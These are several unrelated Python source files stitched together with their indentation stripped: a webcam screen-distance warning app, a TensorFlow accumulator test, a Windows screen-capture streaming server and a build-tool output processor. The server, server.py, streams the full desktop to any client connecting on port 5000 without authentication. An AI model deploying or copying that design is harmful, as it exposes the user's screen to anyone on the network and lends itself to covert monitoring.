write_message("Welcome to GoodEyes!", rectangle=(screen_width/2, 95), centered=True, font=font_16)
write_message("You will be warned if you are too close to the screen", rectangle=(screen_width/2, 120), centered=True, font=font_16)
write_message("Press the button to start tracking!", rectangle=(screen_width/2, 140), centered=True, font=font_16)
give_averages()
button_off = button((255,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
pygame.display.update()
return(button_off)
draw_Initial_Screen()
def write_message(message, color = (0,0,0), rectangle=[0,0], font=font_18, update = True, centered = False):
mesg = font.render(message, True, color)
if centered:
w,h = rectangle
rectangle = [w-mesg.get_width()/2,h]
screen.blit(mesg, rectangle)
if update:
pygame.display.update()
def change_button_colors(button_off):
Open = True
for event in pygame.event.get():
if event.type == pygame.MOUSEBUTTONDOWN:
if button_off.color == (100,0,0):
button_off = button((0,255,0),220,180,50,50,text="ON")
button_off.draw(screen)
if button_off.color == (0,100,0):
button_off = button((255,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
Open = False
if event.type == pygame.MOUSEMOTION:
pos = pygame.mouse.get_pos()
if button_off.isOver(pos):
if button_off.color == (255,0,0):
button_off = button((100,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
elif button_off.color == (0,255,0):
button_off = button((0,100,0),220,180,50,50,text="ON")
button_off.draw(screen)
else:
if button_off.color == (100,0,0):
button_off = button((255,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
elif button_off.color == (0,100,0):
button_off = button((0,255,0),220,180,50,50,text="ON")
button_off.draw(screen)
if event.type == pygame.QUIT:
Open = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
Open = False
if event.key == pygame.K_q:
Open = False
pygame.display.update()
return(Open, button_off)
parser = argparse.ArgumentParser(description='Code for Cascade Classifier tutorial.')
parser.add_argument('--face_cascade', help='Path to face cascade.', default= cv.data.haarcascades + 'haarcascade_frontalface_default.xml')
parser.add_argument('--eyes_cascade', help='Path to eyes cascade.', default= cv.data.haarcascades + 'haarcascade_eye.xml')
parser.add_argument('--camera', help='Camera divide number.', type=int, default=0)
args = parser.parse_args()
face_cascade_name = args.face_cascade
eyes_cascade_name = args.eyes_cascade
face_cascade = cv.CascadeClassifier()
eyes_cascade = cv.CascadeClassifier()
if not face_cascade.load(cv.samples.findFile(face_cascade_name)):
print('--(!)Error loading face cascade')
exit(0)
if not eyes_cascade.load(cv.samples.findFile(eyes_cascade_name)):
print('--(!)Error loading eyes cascade')
exit(0)
camera_device = args.camera
def updateGUI():
clock.tick(60)
#pygame_intro() change to:
button_off = draw_Initial_Screen()
Open = True
while True:
Open, button_off = change_button_colors(button_off)
if button_off.color == (0,255,0) or Open==False:
break
Thread(target=updateGUI, args=()).start()
start = time.time()
timeLast = start
alertTimeLimit = 5 #seconds. Change this variable with the interface code
alertTime = 0
totalAlertTime = 0
distance_list=[]
num_popups = 0
already_seen = False
while Open:
Open, button_off = change_button_colors(button_off)
timeNow = time.time()
ret, frame = stream.read()
width = detectWidth(frame)
distance_list.append(width)
if width > 220:
print(timeNow - timeLast)
alertTime = timeNow - timeLast
#This line creates the popup after a period of time has past where face is too close to screen
if(timeNow - timeLast > alertTimeLimit):
if already_seen:
already_seen = False
continue
else:
already_seen = True
MB_YESNO = 4
MB_TOPMOST = 0x40000
uType = 0 | MB_TOPMOST
Mbox('Get away!', 'You are too close to the screen', uType)
num_popups +=1
else:
totalAlertTime += alertTime
alertTime = 0
screen.fill((255,255,255), (20,200,150,30))
write_message("total alert time: {:.1f}s".format(totalAlertTime), rectangle=[20,200])
pygame.display.update
print("total aleart time", totalAlertTime)
timeLast = timeNow
pygame.display.flip()
if (cv.waitKey(1) & 0xFF == ord('q')):
break
end = time.time()
totalTime = end - start
if totalTime > 0:
write_json(totalAlertTime, totalTime, num_popups)
stream.release()
cv.destroyAllWindows()
pygame.quit()
|
conditional_accumulator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
# from functools import reduce
class ConditionalAccumulatorTest(tf.test.TestCase):
def testConstructor(self):
with tf.Graph().as_default():
q = tf.ConditionalAccumulator(tf.float32, name="Q")
self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.accumulator_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'ConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { unknown_rank: true} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.accumulator_ref.op.node_def)
def testConstructorWithShape(self):
with tf.Graph().as_default():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1, 5, 2, 8]))
self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.accumulator_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'ConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { dim {size: 1 }
dim {size: 5 }
dim {size: 2 }
dim {size: 8 }
} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.accumulator_ref.op.node_def)
def testAccumulatorSizeEmpty(self):
with self.test_session():
q = tf.ConditionalAccumulator(tf.float32, name="Q")
self.assertEqual(q.num_accumulated().eval(), 0)
def testAccumulatorSetGlobalStep(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
set_global_step_op = q.set_global_step(1)
set_global_step_op.run()
def testAccumulatorApplyGradFloat32(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
accum_op.run()
def testDtypes(self):
with self.test_session() as sess:
dtypes = [tf.float16, tf.float32, tf.float64]
for i in range(len(dtypes)):
dtype = dtypes[i]
q = tf.ConditionalAccumulator(dtype, shape=tf.TensorShape([1]))
elems = np.arange(10).astype(dtype.as_numpy_dtype)
for e in elems:
q.apply_grad((e,)).run()
result = sess.run(q.take_grad(1))
self.assertEqual(sum(elems) / len(elems), result)
def testAccumulatorMultipleAccumulators(self):
with self.test_session():
q_f32_0 = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
q_f32_1 = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
q_f16_0 = tf.ConditionalAccumulator(
tf.float16, name="Q", shape=tf.TensorShape([1]))
q_f16_1 = tf.ConditionalAccumulator(
tf.float16, name="Q", shape=tf.TensorShape([1]))
accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
for i in range(len(accums)):
accums[i].apply_grad((i + 10.0,)).run()
for i in range(len(accums)):
result = accums[i].take_grad(1).eval()
self.assertEqual(result, i + 10.0)
def testAccumulatorApplyAndTakeGradWithShape(self):
with self.test_session():
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(x, y)]
for x, y in zip(elems[0], elems[1])]
accum_ops = [q.apply_grad(x) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
is_all_equal = True
val = takeg_t.eval()
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
def testAccumulatorApplyGradWithWrongShape(self):
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
with self.assertRaises(ValueError):
q.apply_grad([[1.0, 2.0], [3.0, 4.0]])
with self.assertRaises(ValueError):
q.apply_grad([[1.0], [2.0], [3.0]])
def testAccumulatorDynamicShape(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
x = tf.placeholder(tf.float32)
accum_op = q.apply_grad(x)
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(c, d)]
for c, d in zip(elems[0], elems[1])]
takeg_t = q.take_grad(1)
for elem in elems:
sess.run(accum_op, feed_dict={x: elem})
is_all_equal = True
val = takeg_t.eval()
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
def testAccumulatorWrongDynamicShape(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
x = tf.placeholder(tf.float32)
accum_op = q.apply_grad(x)
# First successful apply_grad determines shape
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]})
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0]]})
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0], [2.0], [3.0]]})
def testAccumulatorSizeAfterApplyGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
def testAccumulatorSizeAfterApplyGradAndTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
extract_t = q.take_grad(2)
# Applying gradient multiple times to increase size from 0 to 2.
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
# Extract will reduce size to 0
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
# Take gradients always sets the size back to 0 if successful.
accum_op = q.apply_grad((10.0,), local_step=1)
accum_op.run()
accum_op.run()
accum_op.run()
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 4)
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
def testAccumulatorTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(tf.constant(1))
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
def testAccumulatorInvalidTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
accum_ops = [q.apply_grad((x,)) for x in elems]
takeg_t = q.take_grad(-1)
for accum_op in accum_ops:
accum_op.run()
with self.assertRaises(tf.errors.InvalidArgumentError):
takeg_t.eval()
def testAccumulatorRepeatedTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
elems = [20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave + 0.0, val)
def testAccumulatorIncrementGlobalStep(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
global_step = tf.Variable(0, name="global_step")
new_global_step = tf.add(global_step, 1)
inc_global_step = tf.assign(global_step, new_global_step)
set_global_step_op = q.set_global_step(new_global_step)
tf.initialize_all_variables().run()
for _ in range(3):
set_global_step_op.run()
inc_global_step.eval()
def testAccumulatorSetGlobalStepPreventsAccumulation(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
local_steps = range(1000, 1005)
accum_ops = [q.apply_grad((0.0 + x,), local_step=x) for x in local_steps]
for ls in local_steps:
set_global_step_op = q.set_global_step(ls)
set_global_step_op.run()
for accum_op in accum_ops:
accum_op.run()
takeg_t = q.take_grad(1)
val = takeg_t.eval()
self.assertEqual(0.0 + sum(x for x in local_steps
if x >= ls) / sum(1 for x in local_steps
if x >= ls), val)
def testParallelApplyGrad(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
def apply_grad(accum_op):
sess.run(accum_op)
threads = [self.checkedThread(
target=apply_grad, args=(o,)) for o in accum_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = takeg_t.eval()
self.assertEqual(val, sum(elems) / len(elems))
def testParallelTakeGrad(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [e for e in range(10)]
accum_ops = [q.apply_grad((np.float32(e),), local_step=e) for e in elems]
takeg_t = q.take_grad(1)
def apply_grad():
for accum_op in accum_ops:
time.sleep(1.0)
sess.run(accum_op)
apply_grad_thread = self.checkedThread(target=apply_grad)
results = []
def take_grad():
results.append(sess.run(takeg_t))
threads = [self.checkedThread(target=take_grad) for _ in range(10)]
for thread in threads:
thread.start()
apply_grad_thread.start()
for thread in threads:
thread.join()
apply_grad_thread.join()
self.assertItemsEqual(elems, results)
def testAccumulatorApplyAndBlockingTake(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(3)
def apply_grad():
time.sleep(1.0)
for accum_op in accum_ops:
sess.run(accum_op)
return_array = []
def take_grad():
return_array.append(sess.run(takeg_t))
accum_thread = self.checkedThread(target=apply_grad)
takeg_thread = self.checkedThread(target=take_grad)
accum_thread.start()
takeg_thread.start()
accum_thread.join()
takeg_thread.join()
self.assertEqual([elems_ave], return_array)
def _blocking_takeg(self, sess, takeg_op):
with self.assertRaisesOpError("TakeGrad operation was cancelled"):
sess.run(takeg_op)
def testAccumulatorCancel(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
takeg_t = q.take_grad(1)
takeg_thread = self.checkedThread(
self._blocking_takeg, args=(sess, takeg_t))
takeg_thread.start()
time.sleep(1.0)
sess.close() # Will cancel blocked operation
takeg_thread.join()
if __name__ == "__main__":
tf.test.main()
|
server.py
|
# -*- coding: utf-8 -*-
import socket
from threading import Thread
from zlib import compress
import binascii
from mss import mss
from PIL import Image
import numpy as np
#import grab_screen
import numpy
import sys
#import pygame
import win32gui, win32ui, win32con, win32api
import cv2
import time
import php
import ctypes
import hashlib
import copy
import base64
import bson
import json
import io
def md5(data):
m = hashlib.md5()
m.update(data)
h = m.hexdigest()
return h
def imgEncodeDecode(in_imgs, ch, quality=5):
# https://qiita.com/ka10ryu1/items/5fed6b4c8f29163d0d65
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), quality]
result, encimg = cv2.imencode('.jpg', in_imgs, encode_param)
if False == result:
print('could not encode image!')
exit()
decimg = cv2.imdecode(encimg, ch)
return decimg
my = php.kit()
WIDTH = 1024
HEIGHT = 768
hwin = win32gui.GetDesktopWindow()
hwindc = win32gui.GetWindowDC(hwin)
srcdc = win32ui.CreateDCFromHandle(hwindc)
memdc = srcdc.CreateCompatibleDC()
bmp = win32ui.CreateBitmap()
play_one = 0;
grab_width = ""
grab_height = ""
grab_left = ""
grab_top = ""
is_first_time = 1
merge_send = []
max_merge = 3
is_new = True
encode_param = [int(cv2.IMWRITE_PNG_COMPRESSION ), 3]
client_server_addr = ""
address = ""
udp_server = ""
sct = mss()
def grab_screen(region=None):
global hwin
global hwindc
global srcdc
global memdc
global bmp
global play_one
global grab_width
global grab_height
global grab_left
global grab_top
global sct
#if region:
# left,top,x2,y2 = region
# width = x2 - left + 1
# height = y2 - top + 1
#else:
if play_one==0:
grab_width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
grab_height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
grab_left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
grab_top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
bmp.CreateCompatibleBitmap(srcdc, grab_width, grab_height)
memdc.SelectObject(bmp)
play_one = 1
'''
memdc.BitBlt((0, 0), (grab_width, grab_height), srcdc, (grab_left, grab_top), win32con.SRCCOPY)
#print(width)
#print(height)
signedIntsArray = bmp.GetBitmapBits(True)
img = np.fromstring(signedIntsArray, dtype='uint8')
img.shape = (grab_height,grab_width,4)
#img.shape = (HEIGHT,WIDTH,4)
#srcdc.DeleteDC()
#memdc.DeleteDC()
#win32gui.ReleaseDC(hwin, hwindc)
#win32gui.DeleteObject(bmp.GetHandle())
'''
monitor = {"top": grab_top, "left": grab_left, "width": grab_width, "height": grab_height}
sct_img = sct.grab(monitor)
img = numpy.array(sct_img)
return cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)
#return img[:,:,::-1]
def to_bytes(self, length, byteorder='big'):
try:
ch = '>' if byteorder.startswith('b') else '<'
hex_str = '%x' % int(self)
n = len(hex_str)
x = binascii.unhexlify(hex_str.zfill(n + (n & 1)))
val = x[-1 * length:] if ch == '>' else x[:length]
except OverflowError:
raise ValueError(self)
return val
def send_data(conn,bytes_size_len,size_bytes,pixels):
#udp_server.sendto(pixels, address)
conn.send(bytes_size_len)
conn.send(size_bytes)
conn.sendall(pixels)
def retreive_screenshot(conn):
#with mss() as sct:
# The region to capture
global is_first_time
global is_new
global encode_param
user32 = ctypes.windll.user32
screen_width=user32.GetSystemMetrics(0)
screen_height=user32.GetSystemMetrics(1)
#screen_width=1024
#screen_height=768
cut_width_counts = 1
cut_height_counts = 2
one_width = int(screen_width / cut_width_counts)
one_height = int(screen_height / cut_height_counts)
#rect = {'top': 0, 'left': 0, 'width': WIDTH, 'height': HEIGHT}
orin_img_md5 = []
data = {
"info":{
"server_width":screen_width,
"server_height":screen_height,
"cuts_x":cut_width_counts,
"cuts_y":cut_height_counts,
"one_width":one_width,
"one_height":one_height
}
}
#print(one_width)
#print(one_height)
for i in range(0,max_merge):
merge_send.append("")
for i in range(0,cut_width_counts*cut_height_counts):
#data["img_data"].append("")
orin_img_md5.append("")
merge_step = 0
while 'recording':
# Capture the screen
#sct_img = sct.grab(sct.monitors[0])
# Tweak the compression level here (0-9)
#img = img.resize((320,240),Image.ANTIALIAS)
#img.rgb.resize((320,240),Image.ANTIALIAS)
#img = Image.frombytes('RGB', sct_img.size, sct_img.rgb)
#img = img.resize((WIDTH, HEIGHT), resample=Image.LANCZOS)
#img = ""
#try:
img = grab_screen()
#img = cv2.imencode('.jpeg', img,encode_param)[1]
#nparr = np.fromstring(cut_img, np.uint8)
#img = cv2.imdecode(img, cv2.IMREAD_COLOR)
#img = imgEncodeDecode(img,cv2.IMREAD_COLOR, 85)
#except:
# continue
#img = img.resize((WIDTH, HEIGHT), resample=Image.LANCZOS)
#img = cv2.resize(img, (data["info"]["new_w"],data["info"]["new_h"]),cv2.INTER_NEAREST )
#is_new = False
#if len(orin_img_data) == 0:
# is_new = True
step=0
if is_first_time == 1:
binary_stream = io.BytesIO()
binary_stream.write(json.dumps(data).encode('ascii'))
binary_stream.write("WTF_____WTF".encode("ascii"))
binary_stream.seek(0)
pixels = binary_stream.read()
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
bytes_size_len = bytes([size_len])
size_bytes = to_bytes(size,size_len,'big')
send_data(conn,bytes_size_len,size_bytes,pixels)
is_first_time = 0
continue
step = 0
for x in range(0,cut_width_counts):
for y in range(0,cut_height_counts):
crop_img = img[one_height*y:one_height*(y+1), one_width*x:one_width*(x+1)]
#crop_img = cv2.resize(crop_img, (one_width,one_height),cv2.INTER_NEAREST )
crop_imgb = crop_img.tobytes()
#IMREAD_COLOR
#crop_imgb = cv2.imencode('.png', crop_img,encode_param)[1].tostring() #, encode_param)[1].tostring()
if is_new == True:
#print("OK3")
#data["img_data"][step]=crop_img
#pixels=pixels+str(crop_imgb)
#binary_stream.write( crop_img.tostring() )
#binary_stream.write("WTF|||||WTF".encode("ascii"))
orin_img_md5[step]=crop_imgb[:-10]
xy = "%d,%d" % (x , y)
merge_send[merge_step] = xy.encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + "WTF|||||WTF".encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + crop_imgb
merge_step=merge_step+1
#binary_stream.seek(0)
#binary_stream.write(xy.encode("ascii"))
#binary_stream.write("WTF|||||WTF".encode("ascii"))
#binary_stream.write(crop_imgb)
#binary_stream.seek(0)
#pixels = binary_stream.read()
#size = len(pixels)
#size_len = (size.bit_length() + 7) // 8
#bytes_size_len = bytes([size_len])
#size_bytes = to_bytes(size,size_len,'big')
#conn.send(bytes([size_len]))
#conn.send(size_bytes)
#conn.sendall(pixels)
#send_data(conn,bytes_size_len,size_bytes,pixels)
else:
if crop_imgb[:-10] != orin_img_md5[step]:
#print("OK2")
#data["img_data"][step]=crop_img
#pixels=pixels+str(crop_imgb)
#binary_stream.write( crop_img.tostring() )
#binary_stream.write("WTF|||||WTF".encode("ascii"))
#orin_img_md5[step]=md5(crop_imgb)
xy = "%d,%d" % (x , y)
merge_send[merge_step] = xy.encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + "WTF|||||WTF".encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + crop_imgb
merge_step = merge_step + 1
orin_img_md5[step]=crop_imgb[:-10]
#pixels = binary_stream.read()
#size = len(pixels)
#size_len = (size.bit_length() + 7) // 8
#bytes_size_len = bytes([size_len])
#size_bytes = to_bytes(size,size_len,'big')
#conn.send(bytes([size_len]))
#conn.send(size_bytes)
#conn.sendall(pixels)
#send_data(conn,bytes_size_len,size_bytes,pixels)
else:
#print("OK1")
xy = "%d,%d" % (x , y)
merge_send[merge_step] = xy.encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + "WTF|||||WTF".encode("ascii")
merge_step = merge_step + 1
#data["img_data"][step]=""
#pixels=pixels+""
#binary_stream.write("WTF|||||WTF".encode("ascii"))
step=step+1
if merge_step >= max_merge:
merge_step=0
binary_stream = io.BytesIO()
for i in range(0,max_merge):
binary_stream.write( merge_send[i] )
if i != max_merge-1:
binary_stream.write( b"MERGE|||MERGE" )
binary_stream.seek(0)
pixels = binary_stream.read()
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
bytes_size_len = bytes([size_len])
size_bytes = to_bytes(size,size_len,'big')
#conn.send(bytes([size_len]))
#conn.send(size_bytes)
#conn.sendall(pixels)
send_data(conn,bytes_size_len,size_bytes,pixels)
is_new = False
# binary_stream.seek(0)
# pixels = binary_stream.read() #pixels.encode('utf-8')
# # Send the size of the pixels length
# size = len(pixels)
# size_len = (size.bit_length() + 7) // 8
# conn.send(bytes([size_len]))
#
# # Send the actual pixels length
# #size_bytes = size.to_bytes(size_len, 'big')
# size_bytes = to_bytes(size,size_len,'big')
# #print(size_bytes)
# conn.send(size_bytes)
#
# # Send pixels
# conn.sendall(pixels)
# time.sleep(0.017)
def main(host='0.0.0.0', port=5000):
global is_first_time
global client_server_addr
global address
global udp_server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
sock.bind((host, port))
#address = ('0.0.0.0', 5000)
#s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#s.bind(address)
try:
sock.listen(50)
print('Server started.')
while 'connected':
conn, addr = sock.accept()
is_first_time = 1
print('Client connected IP:', addr)
#client_server_addr = addr
thread = Thread(target=retreive_screenshot, args=(conn,))
thread.start()
#if address =="":
# address = (client_server_addr[0], 5001)
# udp_server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#udp_server.sendto("WTF".encode("ascii"), address)
finally:
sock.close()
if __name__ == '__main__':
main(host='0.0.0.0',port=5000)
|
output_processor.py
|
# Copyright Jamie Allsop 2011-2019
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#-------------------------------------------------------------------------------
# Output Processor
#-------------------------------------------------------------------------------
import subprocess
import sys
import os
import re
import time
import threading
import shlex
import platform
import logging
import cuppa.timer
from cuppa.colourise import as_colour, as_emphasised, as_highlighted, as_notice
from cuppa.log import logger
from cuppa.utility.python2to3 import as_str, errno, Queue
def command_available( command ):
try:
with open(os.devnull) as devnull:
subprocess.Popen( shlex.split( command ), stdout=devnull, stderr=devnull ).communicate()
except OSError as e:
if e.errno == errno.ENOENT:
return False
return True
class LineConsumer:
def __init__( self, call_readline, processor=None ):
self.call_readline = call_readline
self.processor = processor
def __call__( self ):
try:
for line in iter( self.call_readline, "" ):
line = as_str( line.rstrip() )
if line:
if self.processor:
line = self.processor( line )
if line:
print( line )
else:
print( line )
except UnicodeDecodeError as error:
print( "WARNING: Ignoring unicode error {}".format( error ) )
class IncrementalSubProcess:
@classmethod
def Popen2( cls, stdout_processor, stderr_processor, args_list, **kwargs ):
kwargs['stdout'] = subprocess.PIPE
kwargs['stderr'] = subprocess.PIPE
timing_enabled = logger.isEnabledFor( logging.DEBUG )
suppress_output = False
if 'suppress_output' in kwargs:
suppress_output = kwargs['suppress_output']
del kwargs['suppress_output']
use_shell = False
if 'scons_env' in kwargs:
use_shell = kwargs['scons_env'].get_option( 'use-shell' )
del kwargs['scons_env']
try:
process = None
stderr_thread = None
timer = timing_enabled and cuppa.timer.Timer() or None
if timer:
logger.debug( "Command [{}] - Running...".format( as_notice(str(timer.timer_id())) ) )
close_fds = platform.system() == "Windows" and False or True
if not suppress_output:
sys.stdout.write( " ".join(args_list) + "\n" )
process = subprocess.Popen(
use_shell and " ".join(args_list) or args_list,
**dict( kwargs, close_fds=close_fds, shell=use_shell, universal_newlines=True )
)
stderr_consumer = LineConsumer( process.stderr.readline, stderr_processor )
stdout_consumer = LineConsumer( process.stdout.readline, stdout_processor )
stderr_thread = threading.Thread( target=stderr_consumer )
stderr_thread.start()
stdout_consumer();
stderr_thread.join()
process.wait()
if timer:
timer.stop()
logger.debug( "Command [{}] - Elapsed {}".format( as_notice(str(timer.timer_id())), cuppa.timer.as_string( timer.elapsed() ) ) )
return process.returncode
except Exception as e:
if timer:
timer.stop()
logger.debug( "Command [{}] - Elapsed {}".format( as_notice(str(timer.timer_id())), cuppa.timer.as_string( timer.elapsed() ) ) )
logger.error( "IncrementalSubProcess.Popen2() failed with error [{}]".format( str(e) ) )
if process:
logger.info( "Killing existing POpen object" )
process.kill()
if stderr_thread:
logger.info( "Joining any running threads" )
stderr_thread.join()
raise e
@classmethod
def Popen( cls, processor, args_list, **kwargs ):
return cls.Popen2( processor, processor, args_list, **kwargs )
class PSpawn(object):
def __init__( self, pspawn, sh, escape, cmd, args, env, stdout, stderr ):
self._pspawn = pspawn
self._sh = sh
self._escape = escape
self._cmd = cmd
self._args = args
self._env = env
self._stdout = stdout
self._stderr = stderr
self._exception = None
def __call__( self ):
try:
self._returncode = self._pspawn( self._sh, self._escape, self._cmd, self._args, self._env, self._stdout, self._stderr )
except BaseException:
self._exception = sys.exc_info()
def returncode( self ):
if self._exception != None:
logger.error("pspawn terminated with exception [{}]".format( str(self._exception) ) )
raise self._exception
return self._returncode
class Stream(object):
def __init__( self, processor, name ):
self._queue = Queue.Queue()
self._processor = processor
self._name = name
def flush( self ):
pass
def write( self, text ):
logger.trace( "Stream _queue.put [{}]".format( self._name ) )
self._queue.put( text )
def read( self, block ):
try:
logger.trace( "Stream _queue.get [{}]".format( self._name ) )
text = self._queue.get( block )
if text:
for line in text.splitlines():
if self._processor:
line = self._processor( line )
if line:
print( line )
else:
print( line )
self._queue.task_done()
except Queue.Empty:
logger.trace( "Stream Queue.Empty raised [{}]".format( self._name ) )
def join( self ):
if self._queue.empty():
logger.trace( "Stream _queue.empty() - flush with None [{}]".format( self._name ) )
self._queue.put( None )
self._queue.join()
class Reader(object):
def __init__( self, stream, finished ):
self._stream = stream
self._finished = finished
def __call__( self ):
while not self._finished.is_set():
self._stream.read(True)
self._stream.read(False)
class Processor:
def __init__( self, scons_env ):
self.scons_env = scons_env
@classmethod
def install( cls, env ):
global _pspawn
_pspawn = env['PSPAWN']
output_processor = cls( env )
if platform.system() == "Windows":
